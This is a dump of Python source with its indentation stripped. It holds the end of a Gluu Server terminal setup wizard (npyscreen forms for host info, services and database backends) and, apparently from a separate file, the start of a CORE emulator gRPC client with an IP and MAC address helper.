self.license_confirm = self.add(npyscreen.Checkbox, scroll_exit=True, name=msg.acknowledge_lisence)
self.warning_text = self.add(npyscreen.MultiLineEdit, value=msg.setup_properties_warning, max_height=4, editable=False)
for sys_req in ('file_max', 'mem_size', 'number_of_cpu', 'free_disk_space'):
cur_val = getattr(base, 'current_' + sys_req)
req_val = static.suggested_mem_size if sys_req == 'mem_size' else getattr(msg, 'suggested_' + sys_req)
if cur_val < req_val:
warning_text = getattr(msg, 'insufficient_' + sys_req).format(cur_val, req_val)
if sys_req == 'file_max':
self.parentApp.exit_reason = warning_text
self.parentApp.onCleanExit()
time.sleep(3.5)
sys.exit(False)
warning_text += '. Do you want to continue?'
result = npyscreen.notify_yes_no(warning_text, title="Warning")
if not result:
self.parentApp.exit_reason = msg.not_to_continue
self.parentApp.onCleanExit()
sys.exit(False)
def nextButtonPressed(self):
if not self.license_confirm.value:
npyscreen.notify_confirm(msg.acknowledge_lisence_ask, title="Info")
return
self.parentApp.switchForm("HostForm")
def on_cancel(self):
self.title.value = "Hello World!"
def resize(self):
self.button_quit.rely = self.lines-5
self.button_quit.relx = self.columns-12
self.warning_text.rely = self.columns - 8
self.button_next.rely = self.lines-5
self.button_next.relx = self.columns-20
class HostForm(GluuSetupForm):
myfields_ = ('ip', 'hostname', 'city', 'state', 'orgName', 'admin_email', 'countryCode', 'application_max_ram', 'oxtrust_admin_password')
def create(self):
self.add(npyscreen.FixedText, value=make_title(msg.cert_info_label), editable=False)
self.ip = self.add(npyscreen.TitleText, name=msg.ip_label, begin_entry_at=25)
self.hostname = self.add(npyscreen.TitleText, name=msg.hostname_label, begin_entry_at=25)
self.orgName = self.add(npyscreen.TitleText, name=msg.orgName_label, begin_entry_at=25)
self.admin_email = self.add(npyscreen.TitleText, name=msg.admin_email_label, begin_entry_at=25)
self.city = self.add(npyscreen.TitleText, name=msg.city_label, begin_entry_at=25)
self.state = self.add(npyscreen.TitleText, name=msg.state_label, begin_entry_at=25)
self.countryCode = self.add(npyscreen.TitleText, name=msg.countryCode_label, begin_entry_at=25)
self.add(npyscreen.FixedText, value=make_title(msg.sys_info_label), rely=12, editable=False)
self.application_max_ram = self.add(npyscreen.TitleText, name=msg.application_max_ram_label, begin_entry_at=25)
self.oxtrust_admin_password = self.add(npyscreen.TitleText, name=msg.oxtrust_admin_password_label, begin_entry_at=25)
def nextButtonPressed(self):
if not self.hostname.value:
npyscreen.notify_confirm(msg.enter_hostname, title="Info")
return
if self.hostname.value.lower() == 'localhost':
npyscreen.notify_confirm(msg.enter_hostname_local, title="Info")
return
if not propertiesUtils.check_email(self.admin_email.value):
npyscreen.notify_confirm(msg.enter_valid_email, title="Info")
return
if not propertiesUtils.isIP(self.ip.value):
npyscreen.notify_confirm(msg.enter_valid_ip, title="Info")
return
if len(self.countryCode.value) != 2:
npyscreen.notify_confirm(msg.enter_valid_countryCode, title="Info")
return
if len(self.city.value) < 2:
npyscreen.notify_confirm(msg.enter_valid_city, title="Info")
return
if len(self.oxtrust_admin_password.value) < 6:
npyscreen.notify_confirm(msg.oxtrust_admin_password_warning, title="Info")
return
try:
int(self.application_max_ram.value)
except:
npyscreen.notify_confirm(msg.max_ram_int_warning, title="Info")
return
for k in self.myfields_:
f = getattr(self, k)
setattr(Config, k, f.value)
Config.application_max_ram = int(self.application_max_ram.value)
self.parentApp.switchForm('ServicesForm')
def do_beforeEditing(self):
if not Config.hostname:
Config.hostname = self.parentApp.jettyInstaller.detect_hostname()
for k in self.myfields_:
f = getattr(self, k)
v = Config.get(k,'')
if v:
f.value = str(v)
f.update()
def backButtonPressed(self):
self.parentApp.switchForm('MAIN')
class ServicesForm(GluuSetupForm):
services_before_this_form = []
if os.environ.get('GLUU_SERVICES'):
services = os.environ['GLUU_SERVICES'].split()
else:
services = ('installHttpd', 'installSaml',
'installPassport', 'installGluuRadius', 'installOxd',
'installCasa', 'installScimServer', 'installFido2',
)
def create(self):
for service in self.services:
cb = self.add(npyscreen.Checkbox, scroll_exit=True, name = getattr(msg, 'ask_' + service))
setattr(self, service, cb)
self.oxd_url = self.add(npyscreen.TitleText, name=msg.oxd_url_label, rely=12, begin_entry_at=17, hidden=True)
self.installCasa.value_changed_callback = self.casa_oxd_option_changed
self.installOxd.value_changed_callback = self.casa_oxd_option_changed
def do_beforeEditing(self):
for service in self.services:
if Config.get(service):
cb = getattr(self, service)
cb.value = True
if Config.installed_instance:
cb.editable = False
self.services_before_this_form.append(service)
cb.update()
if Config.installed_instance and 'installCasa' in self.services_before_this_form:
self.oxd_url.hidden = True
self.oxd_url.update()
def nextButtonPressed(self):
for service in self.services:
cb_val = getattr(self, service).value
if cb_val and Config.installed_instance and not Config.get(service):
Config.addPostSetupService.append(service)
setattr(Config, service, cb_val)
if cb_val and service in Config.non_setup_properties['service_enable_dict']:
for attribute in Config.non_setup_properties['service_enable_dict'][service]:
setattr(Config, attribute, 'true')
if Config.installed_instance and not Config.addPostSetupService:
exit_result = npyscreen.notify_yes_no(
msg.exit_post_setup,
title="Warning"
)
if exit_result:
sys.exit(False)
else:
return
if 'installSaml' in self.services and self.installSaml:
Config.shibboleth_version = 'v3'
if self.installOxd.value:
Config.oxd_server_https = 'https://{}:8443'.format(Config.hostname)
if self.installCasa.value:
if not self.installOxd.value and not self.oxd_url.value:
npyscreen.notify_confirm(msg.install_oxd_or_url_warning, title="Warning")
return
if not self.installOxd.value:
oxd_server_https = self.oxd_url.value
oxd_connection_result = propertiesUtils.check_oxd_server(oxd_server_https)
if oxd_connection_result != True:
npyscreen.notify_confirm(
msg.oxd_connection_error.format(oxd_server_https, oxd_connection_result),
title="Warning"
)
return
oxd_hostname, oxd_port = self.parentApp.gluuInstaller.parse_url(oxd_server_https)
oxd_ssl_result = propertiesUtils.check_oxd_ssl_cert(oxd_hostname, oxd_port)
if oxd_ssl_result :
npyscreen.notify_confirm(
msg.oxd_ssl_cert_error.format(oxd_ssl_result['CN'], oxd_hostname),
title="Warning")
return
Config.oxd_server_https = oxd_server_https
propertiesUtils.check_oxd_server_https()
if self.installOxd.value and not 'installOxd' in self.services_before_this_form:
result = npyscreen.notify_yes_no(msg.ask_use_gluu_storage_oxd, title=msg.ask_use_gluu_storage_oxd_title)
if result:
Config.oxd_use_gluu_storage = True
# check if we have enough memory
if not self.parentApp.jettyInstaller.calculate_selected_aplications_memory():
result = npyscreen.notify_yes_no(msg.memory_warning, title="Warning")
if not result:
return
if Config.installed_instance:
self.parentApp.switchForm('DisplaySummaryForm')
else:
self.parentApp.switchForm('DBBackendForm')
def casa_oxd_option_changed(self, widget):
if self.installOxd.value:
self.oxd_url.hidden = True
elif self.installCasa.value and not self.installOxd.value:
self.oxd_url.hidden = False
elif not self.installCasa.value:
self.oxd_url.hidden = True
self.oxd_url.update()
def backButtonPressed(self):
self.parentApp.switchForm('HostForm')
def make_title(text):
return '-'*10 + ' '+ text +' '+ '-'*10
class DBBackendForm(GluuSetupForm):
def create(self):
self.backends = self.add(npyscreen.TitleSelectOne, max_height=8, value = [0,], name=msg.chose_backend,
values = [], scroll_exit=True)
self.beta_warning_label = self.add(npyscreen.TitleFixedText, name=msg.mysql_spanner_beta, relx=23, editable=False, labelColor='WARNING', hidden=True)
self.backends.value_changed_callback = self.backend_changed
def do_beforeEditing(self):
self.backend_types = ['Local OpenDj',
'Remote OpenDj',
'Remote Couchbase',
'Local MySQL',
'Remote MySQL',
'Cloud Spanner',
'Spanner Emulator',
]
if 'couchbase' in propertiesUtils.getBackendTypes():
self.backend_types.insert(2, 'Local Couchbase')
self.backends.values = self.backend_types
self.backends.update()
def backend_changed(self, widget):
self.beta_warning_label.hidden = True if self.backends.value[0] < 3 else False
self.beta_warning_label.update()
def nextButtonPressed(self):
self.parentApp.backend_type_str = self.backend_types[self.backends.value[0]]
if self.parentApp.backend_type_str == 'Local OpenDj':
Config.ldap_install = static.InstallTypes.LOCAL
Config.cb_install = static.InstallTypes.NONE
Config.rdbm_install = False
self.parentApp.switchForm('DBLDAPForm')
elif self.parentApp.backend_type_str == 'Remote OpenDj':
Config.ldap_install = static.InstallTypes.REMOTE
Config.cb_install = static.InstallTypes.NONE
Config.rdbm_install = False
self.parentApp.switchForm('DBLDAPForm')
elif self.parentApp.backend_type_str == 'Local Couchbase':
Config.ldap_install = static.InstallTypes.NONE
Config.rdbm_install = False
Config.cb_install = static.InstallTypes.LOCAL
self.parentApp.switchForm('DBCBForm')
elif self.parentApp.backend_type_str == 'Remote Couchbase':
Config.ldap_install = static.InstallTypes.NONE
Config.rdbm_install = False
Config.cb_install = static.InstallTypes.REMOTE
self.parentApp.switchForm('DBCBForm')
elif self.parentApp.backend_type_str == 'Local MySQL':
Config.ldap_install = static.InstallTypes.NONE
Config.rdbm_install_type = static.InstallTypes.LOCAL
Config.rdbm_install = True
Config.rdbm_type = 'mysql'
if not Config.rdbm_password:
Config.rdbm_password = propertiesUtils.getPW(special='.*=+-()[]{}')
if not Config.rdbm_user:
Config.rdbm_user = 'gluu'
self.parentApp.switchForm('DBRDBMForm')
elif self.parentApp.backend_type_str == 'Remote MySQL':
Config.ldap_install = static.InstallTypes.NONE
Config.rdbm_install_type = static.InstallTypes.REMOTE
Config.rdbm_install = True
Config.rdbm_type = 'mysql'
Config.rdbm_password = ''
self.parentApp.switchForm('DBRDBMForm')
elif self.parentApp.backend_type_str in ('Cloud Spanner', 'Spanner Emulator'):
if Config.installSaml:
npyscreen.notify_confirm(msg.spanner_idp_warning + ' ' + msg.idp_unselect, title="Warning")
return
Config.rdbm_type = 'spanner'
Config.rdbm_install = True
Config.ldap_install = static.InstallTypes.NONE
Config.rdbm_install_type = static.InstallTypes.REMOTE
self.parentApp.switchForm('DBSpannerForm')
def backButtonPressed(self):
self.parentApp.switchForm('ServicesForm')
class DBLDAPForm(GluuSetupForm):
def create(self):
self.ldap_password = self.add(npyscreen.TitleText, name=msg.ldap_admin_password_label, begin_entry_at=22)
self.ldap_hosts = self.add(npyscreen.TitleText, name=msg.ldap_remote_label, begin_entry_at=22)
def do_beforeEditing(self):
if Config.ldap_install == static.InstallTypes.LOCAL:
self.ldap_hosts.hidden = True
else:
self.ldap_hosts.hidden = False
if Config.ldap_install == static.InstallTypes.LOCAL:
if not Config.ldapPass:
self.ldap_password.value = Config.oxtrust_admin_password
else:
self.ldap_password.value = ''
self.ldap_password.update()
self.ldap_hosts.update()
def nextButtonPressed(self):
if Config.ldap_install == static.InstallTypes.LOCAL:
Config.ldap_hostname = 'localhost'
Config.ldapPass = self.ldap_password.value
# check if opendj ports are available
used_ports = base.check_port_available((1389, 4444, 1636))
s, aux, w = ('', 'is', 'this') if len(used_ports) == 1 else ('s', 'are', 'these')
if used_ports:
port_msg = msg.opendj_port_availibility.format(s, ','.join(used_ports), aux, w)
npyscreen.notify_confirm(port_msg, title="Warning")
return
elif Config.ldap_install == static.InstallTypes.REMOTE:
Config.ldap_hostname = self.ldap_hosts.value
Config.ldapPass = self.ldap_password.value
npyscreen.notify("Please wait while checking remote ldap connection", title="Wait!")
result = propertiesUtils.check_remote_ldap(
self.ldap_hosts.value,
Config.ldap_binddn,
self.ldap_password.value
)
if not result['result']:
npyscreen.notify_confirm(result['reason'], title="Warning")
return
self.parentApp.switchForm('DisplaySummaryForm')
def backButtonPressed(self):
self.parentApp.switchForm('DBBackendForm')
class DBCBForm(GluuSetupForm):
def create(self):
self.cb_admin = self.add(npyscreen.TitleText, name=msg.cb_username_label, begin_entry_at=22)
self.cb_password = self.add(npyscreen.TitleText, name=msg.cb_password_label, begin_entry_at=22)
self.cb_hosts = self.add(npyscreen.TitleText, name=msg.cb_hosts_label, begin_entry_at=22)
def do_beforeEditing(self):
if Config.cb_install == static.InstallTypes.LOCAL:
self.cb_hosts.hidden = True
elif Config.cb_install == static.InstallTypes.REMOTE:
self.cb_hosts.hidden = False
self.cb_hosts.update()
def nextButtonPressed(self):
Config.cb_password = self.cb_password.value
if Config.cb_install == static.InstallTypes.LOCAL:
Config.couchbase_hostname = 'localhost'
elif Config.cb_install == static.InstallTypes.REMOTE:
Config.couchbase_hostname = self.cb_hosts.value
Config.couchebaseClusterAdmin = self.cb_admin.value
npyscreen.notify("Please wait while checking remote Couchbase connection", title="Wait!")
result = propertiesUtils.test_cb_servers(self.cb_hosts.value)
if not result['result']:
npyscreen.notify_confirm(result['reason'], title="Warning")
return
self.parentApp.switchForm('DisplaySummaryForm')
def backButtonPressed(self):
self.parentApp.switchForm('DBBackendForm')
class DBRDBMForm(GluuSetupForm):
def create(self):
self.rdbm_db = self.add(npyscreen.TitleText, name=msg.rdbm_db_label.format(Config.rdbm_type.upper()), begin_entry_at=22)
self.rdbm_user = self.add(npyscreen.TitleText, name=msg.rdbm_username_label.format(Config.rdbm_type.upper()), begin_entry_at=22)
self.rdbm_password = self.add(npyscreen.TitleText, name=msg.rdbm_password_label.format(Config.rdbm_type.upper()), begin_entry_at=22)
self.rdbm_host = self.add(npyscreen.TitleText, name=msg.rdbm_host_label.format(Config.rdbm_type.upper()), begin_entry_at=22)
self.rdbm_port = self.add(npyscreen.TitleText, name=msg.rdbm_db_port_label.format(Config.rdbm_type.upper()), begin_entry_at=22)
def do_beforeEditing(self):
if Config.rdbm_install_type == static.InstallTypes.LOCAL:
self.rdbm_host.hidden = True
self.rdbm_port.hidden = True
elif Config.rdbm_install_type == static.InstallTypes.REMOTE:
self.rdbm_host.hidden = False
self.rdbm_port.hidden = False
for vname in ('rdbm_user', 'rdbm_password', 'rdbm_host', 'rdbm_db', 'rdbm_port'):
npyscr_obj = getattr(self, vname)
npyscr_obj.value = str(Config.get(vname)) if Config.get(vname) else ''
npyscr_obj.update()
def nextButtonPressed(self):
Config.rdbm_user = self.rdbm_user.value
Config.rdbm_password = self.rdbm_password.value
Config.rdbm_db = self.rdbm_db.value
if Config.rdbm_install_type == static.InstallTypes.LOCAL:
Config.rdbm_host = 'localhost'
Config.rdbm_port = 3306
else:
Config.rdbm_host = self.rdbm_host.value
if not self.rdbm_port.value.isnumeric():
npyscreen.notify_confirm("Port must be integer", title="Warning")
return
Config.rdbm_port = int(self.rdbm_port.value)
npyscreen.notify("Please wait while checking mysql connection", title="Wait!")
try:
pymysql.connect(host=Config.rdbm_host, user=Config.rdbm_user, password=Config.rdbm_password, database=Config.rdbm_db, port=Config.rdbm_port)
except Exception as e:
npyscreen.notify_confirm(str(e), title="Warning")
return
self.parentApp.switchForm('DisplaySummaryForm')
def backButtonPressed(self):
self.parentApp.switchForm('DBBackendForm')
class DBSpannerForm(GluuSetupForm):
def create(self):
self.spanner_project = self.add(npyscreen.TitleText, name=msg.spanner_project_label, begin_entry_at=22)
self.spanner_instance = self.add(npyscreen.TitleText, name=msg.spanner_instance_label, begin_entry_at=22)
self.spanner_database = self.add(npyscreen.TitleText, name=msg.spanner_database_label, begin_entry_at=22)
self.google_application_credentials = self.add(npyscreen.TitleFilenameCombo, name=msg.spanner_cred_label, begin_entry_at=40)
self.spanner_emulator_host = self.add(npyscreen.TitleText, name=msg.spanner_emulator_host_label, begin_entry_at=22)
def do_beforeEditing(self):
#self.rdbm_db.value = self.parentApp.backend_type_str
#self.rdbm_db.update()
if self.parentApp.backend_type_str == 'Spanner Emulator':
self.google_application_credentials.hidden = True
self.spanner_emulator_host.hidden = False
else:
self.google_application_credentials.hidden = False
self.spanner_emulator_host.hidden = True
self.google_application_credentials.update()
for vname in ('spanner_project', 'spanner_instance', 'spanner_database', 'spanner_emulator_host', 'google_application_credentials'):
npyscr_obj = getattr(self, vname)
npyscr_obj.value = str(Config.get(vname)) if Config.get(vname) else ''
npyscr_obj.update()
def nextButtonPressed(self):
if self.parentApp.backend_type_str == 'Spanner Emulator':
Config.spanner_emulator_host = self.spanner_emulator_host.value
Config.google_application_credentials = ''
else:
Config.spanner_emulator_host = ''
Config.google_application_credentials = self.google_application_credentials.value
if not os.path.isfile(Config.google_application_credentials):
npyscreen.notify_confirm("Please enter Google application creditentals file", title="Warning")
return
else:
try:
with open(Config.google_application_credentials) as f:
json.load(f)
except:
npyscreen.notify_confirm("Please enter valid Google application creditentals file", title="Warning")
return
Config.spanner_project = self.spanner_project.value
Config.spanner_instance = self.spanner_instance.value
Config.spanner_database = self.spanner_database.value
npyscreen.notify("Please wait while checking spanner connection", title="Wait!")
try:
spanner = Spanner()
spanner.get_session()
except Exception as e:
npyscreen.notify_confirm("ERROR getting session from spanner: {}".format(e), title="Warning")
return
self.parentApp.switchForm('DisplaySummaryForm')
def backButtonPressed(self):
self.parentApp.switchForm('DBBackendForm')
class DBBackendFormOld(GluuSetupForm):
def create(self):
self.editw = 2
self.add(npyscreen.FixedText, value=make_title(msg.ask_ldap_install), editable=False)
self.ask_ldap = self.add(npyscreen.SelectOne, max_height=3,
values = msg.ldap_install_options, scroll_exit=True)
self.ask_ldap.value_changed_callback = self.ldap_option_changed
self.ldap_password = self.add(npyscreen.TitleText, name=msg.password_label)
self.ldap_hosts = self.add(npyscreen.TitleText, name=msg.hosts_label)
self.ldap_option_changed(self.ask_ldap)
self.add(npyscreen.FixedText, value=make_title(msg.ask_cb_install), rely=10, editable=False)
self.ask_cb = self.add(npyscreen.SelectOne, max_height=3,
values = msg.cb_install_options, scroll_exit=True)
self.ask_cb.value_changed_callback = self.cb_option_changed
self.cb_admin = self.add(npyscreen.TitleText, name=msg.username_label)
self.cb_password = self.add(npyscreen.TitleText, name=msg.password_label)
self.cb_hosts = self.add(npyscreen.TitleText, name=msg.hosts_label)
self.cb_option_changed(self.ask_cb)
def do_beforeEditing(self):
self.ask_ldap.value = [int(Config.ldap_install)]
if Config.ldap_install == static.InstallTypes.REMOTE:
self.ldap_hosts.hidden = False
else:
self.ldap_hosts.hidden = True
if not Config.ldap_install:
self.ldap_password.hidden = True
else:
self.ldap_password.hidden = False
if Config.ldap_install == static.InstallTypes.LOCAL:
if not Config.ldapPass:
self.ldap_password.value = Config.oxtrust_admin_password
self.ldap_hosts.value = Config.ldap_hostname
self.ask_cb.value = [int(Config.cb_install)]
if not Config.cb_install:
self.cb_admin.hidden = True
else:
self.cb_admin.hidden = False
if Config.cb_install == static.InstallTypes.REMOTE:
self.cb_hosts.hidden = False
else:
self.cb_hosts.hidden = True
if not Config.cb_install:
self.cb_password.hidden = True
else:
self.cb_password.hidden = False
if Config.cb_install == static.InstallTypes.LOCAL:
if not Config.cb_password:
self.cb_password.value = Config.oxtrust_admin_password
self.cb_hosts.value = Config.get('couchbase_hostname', '')
self.cb_admin.value = Config.get('couchebaseClusterAdmin','')
self.ldap_hosts.update()
self.ask_ldap.update()
self.ldap_hosts.update()
self.ldap_password.update()
self.cb_hosts.update()
self.ask_cb.update()
self.cb_hosts.update()
self.cb_password.update()
def nextButtonPressed(self):
msg.backend_types = []
Config.ldap_install = str(self.ask_ldap.value[0]) if self.ask_ldap.value[0] else 0
if Config.ldap_install == static.InstallTypes.LOCAL:
Config.ldap_hostname = 'localhost'
Config.ldapPass = self.ldap_password.value
# check if opendj ports are available
used_ports = base.check_port_available((1389, 4444, 1636))
s, aux, w = ('', 'is', 'this') if len(used_ports) == 1 else ('s', 'are', 'these')
if used_ports:
port_msg = msg.opendj_port_availibility.format(s, ','.join(used_ports), aux, w)
npyscreen.notify_confirm(port_msg, title="Warning")
return
elif Config.ldap_install == static.InstallTypes.REMOTE:
Config.ldap_hostname = self.ldap_hosts.value
Config.ldapPass = self.ldap_password.value
result = propertiesUtils.check_remote_ldap(
self.ldap_hosts.value,
Config.ldap_binddn,
self.ldap_password.value
)
if not result['result']:
npyscreen.notify_confirm(result['reason'], title="Warning")
return
Config.cb_install = str(self.ask_cb.value[0]) if self.ask_cb.value[0] else 0
if Config.cb_install == static.InstallTypes.LOCAL:
Config.couchbase_hostname = 'localhost'
Config.cb_password = self.cb_password.value
elif Config.cb_install == static.InstallTypes.REMOTE:
Config.couchbase_hostname = self.cb_hosts.value
Config.couchebaseClusterAdmin = self.cb_admin.value
Config.cb_password = self.cb_password.value
result = propertiesUtils.test_cb_servers(self.cb_hosts.value)
if not result['result']:
npyscreen.notify_confirm(result['reason'], title="Warning")
return
if Config.ldap_install == static.InstallTypes.LOCAL and not propertiesUtils.checkPassword(Config.ldapPass):
npyscreen.notify_confirm(msg.weak_password.format('OpenDj'), title="Warning")
return
if Config.cb_install == static.InstallTypes.LOCAL and not propertiesUtils.checkPassword(Config.cb_password):
npyscreen.notify_confirm(msg.weak_password.format('Couchbase Server'), title="Warning")
return
if Config.ldap_install or Config.cb_install:
if Config.ldap_install and Config.cb_install:
Config.persistence_type = 'hybrid'
self.parentApp.switchForm('StorageSelectionForm')
else:
storage_list = list(Config.couchbaseBucketDict.keys())
storage = 'ldap'
if Config.cb_install:
storage = 'couchbase'
for s in storage_list:
Config.mappingLocations[s] = storage
Config.persistence_type = storage
self.parentApp.switchForm('DisplaySummaryForm')
else:
npyscreen.notify_confirm(msg.notify_select_backend, title="Warning")
return
def ldap_option_changed(self, widget):
if self.ask_ldap.value:
if not self.ask_ldap.value[0]:
self.ldap_password.hidden = True
self.ldap_hosts.hidden = True
elif str(self.ask_ldap.value[0]) == static.InstallTypes.LOCAL:
self.ldap_password.hidden = False
self.ldap_hosts.hidden = True
elif str(self.ask_ldap.value[0]) == static.InstallTypes.REMOTE:
self.ldap_password.hidden = False
self.ldap_hosts.hidden = False
self.ldap_password.update()
self.ldap_hosts.update()
def cb_option_changed(self, widget):
if self.ask_cb.value:
if not self.ask_cb.value[0]:
self.cb_admin.hidden = True
self.cb_password.hidden = True
self.cb_hosts.hidden = True
elif str(self.ask_cb.value[0]) == static.InstallTypes.LOCAL:
self.cb_admin.hidden = False
self.cb_hosts.hidden = False
self.cb_password.hidden = False
self.cb_hosts.hidden = True
elif str(self.ask_cb.value[0]) == static.InstallTypes.REMOTE:
self.cb_admin.hidden = False
self.cb_password.hidden = False
self.cb_hosts.hidden = False
self.cb_admin.update()
self.cb_password.update()
self.cb_hosts.update()
def backButtonPressed(self):
self.parentApp.switchForm('ServicesForm')
class StorageSelectionForm(GluuSetupForm):
def create(self):
self.ldap_storage = self.add(npyscreen.TitleMultiSelect, begin_entry_at=30, max_height=len(Config.couchbaseBucketDict),
values=list(Config.couchbaseBucketDict.keys()), name=msg.DBBackendForm_label, scroll_exit=True)
self.add(npyscreen.FixedText, value=msg.unselected_storages, rely=len(Config.couchbaseBucketDict)+4, editable=False, color='STANDOUT')
def backButtonPressed(self):
self.parentApp.switchForm('DBBackendForm')
def do_beforeEditing(self):
self.ldap_storage.values = list(Config.couchbaseBucketDict.keys())
value = []
for i, s in enumerate(Config.couchbaseBucketDict.keys()):
if Config.mappingLocations[s] == 'ldap':
value.append(i)
self.ldap_storage.value = value
self.ldap_storage.update()
def nextButtonPressed(self):
storage_list = list(Config.couchbaseBucketDict.keys())
for i, s in enumerate(storage_list):
if i in self.ldap_storage.value:
Config.mappingLocations[s] = 'ldap'
else:
Config.mappingLocations[s] = 'couchbase'
self.parentApp.switchForm('DisplaySummaryForm')
class DisplaySummaryForm(GluuSetupForm):
myfields_1 = ["hostname", "orgName", "os_type", "city", "state", "countryCode",
"application_max_ram"]
myfields_2 = [ "installOxAuth", "installOxTrust"]
if os.environ.get('GLUU_SERVICES'):
myfields_2 += os.environ['GLUU_SERVICES'].split()
else:
myfields_2 += ["installSaml",
"installPassport", "installGluuRadius",
"installOxd", "installCasa",
'installScimServer', 'installFido2']
myfields_2 += ["java_type","backend_types", 'ldap_storages']
def create(self):
for i, wn in enumerate(self.myfields_1):
setattr(self,
wn,
self.add(
npyscreen.TitleFixedText,
name=getattr(msg, wn+'_label'),
value="",
begin_entry_at=24,
editable=False,
)
)
sec_col_n = math.ceil(len(self.myfields_2)/2.0)
for j, wn in enumerate(self.myfields_2):
if j < sec_col_n:
relx=2
rely = i+4+j
else:
relx=39
rely = i+4+j-sec_col_n
setattr(self,
wn,
self.add(
npyscreen.TitleFixedText,
name=getattr(msg, wn+'_label'),
value="",
begin_entry_at=20,
editable=False,
rely=rely,
relx=relx,
)
)
def do_beforeEditing(self):
for wn in self.myfields_1+self.myfields_2:
w = getattr(self, wn)
if getClassName(w) == 'TitleFixedText':
if wn == 'backend_types':
bt_ = []
if Config.ldap_install == static.InstallTypes.LOCAL:
bt_.append('opendj')
elif Config.ldap_install == static.InstallTypes.REMOTE:
bt_.append('opendj[R]')
if Config.cb_install == static.InstallTypes.LOCAL:
bt_.append('couchbase')
elif Config.cb_install == static.InstallTypes.REMOTE:
bt_.append('couchbase[R]')
if Config.rdbm_install_type == static.InstallTypes.LOCAL:
bt_.append('{}'.format(Config.rdbm_type))
elif Config.rdbm_install_type == static.InstallTypes.REMOTE:
if Config.rdbm_type == 'spanner':
if Config.spanner_emulator_host:
bt_.append('spenner[E]')
else:
bt_.append('spenner[C]')
else:
bt_.append('{}[R]'.format(Config.rdbm_type))
w.value = ', '.join(bt_)
elif wn == 'ldap_storages':
if Config.ldap_install and Config.cb_install:
wds_ = []
for k in Config.mappingLocations:
if Config.mappingLocations[k] == 'ldap':
wds_.append(k)
w.hidden = False
w.value = ', '.join(wds_)
else:
w.hidden = True
else:
val = Config.get(wn, 'NA')
w.value = str(val)
if wn in Config.addPostSetupService:
w.value += ' *'
w.labelColor = 'STANDOUT'
w.update()
if self.parentApp.setup_loaded:
self.button_back.hidden=True
self.button_back.update()
def backButtonPressed(self):
if Config.installed_instance:
self.parentApp.switchForm('MAIN')
elif Config.ldap_install and Config.cb_install:
self.parentApp.switchForm('StorageSelectionForm')
else:
self.parentApp.switchForm('DBBackendForm')
def nextButtonPressed(self):
# Validate Properties
propertiesUtils.check_properties()
self.parentApp.switchForm('InstallStepsForm')
class InputBox(npyscreen.BoxTitle):
_contained_widget = npyscreen.MultiLineEdit
class MySlider(npyscreen.SliderPercent):
pass
class InstallStepsForm(GluuSetupForm):
desc_value = None
current_stage = 0
def create(self):
self.progress_percantage = self.add(MySlider, rely=4, accuracy=0, editable=False, name="Progress")
self.installing = self.add(npyscreen.TitleFixedText, name=msg.installing_label, value="", editable=False)
self.description = self.add(InputBox, name="", max_height=6, rely=8)
def do_beforeEditing(self):
gluuProgress.before_start()
self.progress_percantage.out_of = len(gluuProgress.services) + 1
self.progress_percantage.update()
t=threading.Thread(target=self.parentApp.do_installation, args=())
t.daemon = True
t.start()
def do_while_waiting(self):
if not Config.thread_queue.empty():
data = Config.thread_queue.get()
current = data.get('current')
current_message = data.get('msg','')
if current == static.COMPLETED:
self.progress_percantage.value = self.progress_percantage.out_of
self.progress_percantage.update()
if Config.post_messages:
npyscreen.notify_confirm('\n'.join(Config.post_messages), title="Post Install Messages", wide=True)
msg_text = msg.post_installation if Config.installed_instance else msg.installation_completed.format(Config.hostname)
npyscreen.notify_confirm(msg_text, title="Completed")
self.parentApp.do_notify = False
self.parentApp.switchForm(None)
elif current == static.ERROR:
npyscreen.notify_confirm(msg.installation_error +"\n"+current_message, title="ERROR")
self.parentApp.do_notify = False
self.parentApp.switchForm(None)
self.progress_percantage.value = self.current_stage
self.progress_percantage.update()
self.installing.value = current_message
self.installing.update()
if self.desc_value != current:
if self.current_stage < self.progress_percantage.out_of:
self.current_stage += 1
if hasattr(msg, 'installation_description_' + str(current)):
desc = getattr(msg, 'installation_description_' + current)
else:
desc = msg.installation_description_gluu
self.description.value = '\n'.join(textwrap.wrap(desc, self.columns - 10))
self.description.update()
self.desc_value = current
def backButtonPressed(self):
pass
def nextButtonPressed(self):
pass
GSA = GluuSetupApp()
|
client.py
|
"""
gRpc client for interfacing with CORE, when gRPC mode is enabled.
"""
from __future__ import print_function
import logging
import threading
from contextlib import contextmanager
import grpc
from core.api.grpc import core_pb2
from core.api.grpc import core_pb2_grpc
from core.nodes.ipaddress import Ipv4Prefix, Ipv6Prefix, MacAddress
class InterfaceHelper(object):
"""
Convenience class to help generate IP4 and IP6 addresses for gRPC clients.
"""
def __init__(self, ip4_prefix=None, ip6_prefix=None):
"""
Creates an InterfaceHelper object.
:param str ip4_prefix: ip4 prefix to use for generation
:param str ip6_prefix: ip6 prefix to use for generation
:raises ValueError: when both ip4 and ip6 prefixes have not been provided
"""
if not ip4_prefix and not ip6_prefix:
raise ValueError("ip4 or ip6 must be provided")
self.ip4 = None
if ip4_prefix:
self.ip4 = Ipv4Prefix(ip4_prefix)
self.ip6 = None
if ip6_prefix:
self.ip6 = Ipv6Prefix(ip6_prefix)
def ip4_address(self, node_id):
"""
Convenience method to return the IP4 address for a node.
:param int node_id: node id to get IP4 address for
:return: IP4 address or None
:rtype: str
"""
if not self.ip4:
raise ValueError("ip4 prefixes have not been set")
return str(self.ip4.addr(node_id))
def ip6_address(self, node_id):
"""
Convenience method to return the IP6 address for a node.
:param int node_id: node id to get IP6 address for
:return: IP4 address or None
:rtype: str
"""
if not self.ip6:
raise ValueError("ip6 prefixes have not been set")
return str(self.ip6.addr(node_id))
def create_interface(self, node_id, interface_id, name=None, mac=None):
"""
Creates interface data for linking nodes, using the nodes unique id for generation, along with a random
mac address, unless provided.
:param int node_id: node id to create interface for
:param int interface_id: interface id for interface
:param str name: name to set for interface, default is eth{id}
:param str mac: mac address to use for this interface, default is random generation
:return: new interface data for the provided node
:rtype: core_pb2.Interface
"""
# generate ip4 data
ip4 = None
ip4_mask = None
if self.ip4:
ip4 = str(self.ip4.addr(node_id))
ip4_mask = self.ip4.prefixlen
# generate ip6 data
ip6 = None
ip6_mask = None
if self.ip6:
ip6 = str(self.ip6.addr(node_id))
ip6_mask = self.ip6.prefixlen
# random mac
if not mac:
mac = MacAddress.random()
return core_pb2.Interface(
id=interface_id,
name=name,
ip4=ip4,
ip4mask=ip4_mask,
ip6=ip6,
ip6mask=ip6_mask,
mac=str(mac)
)
def stream_listener(stream, handler):
"""
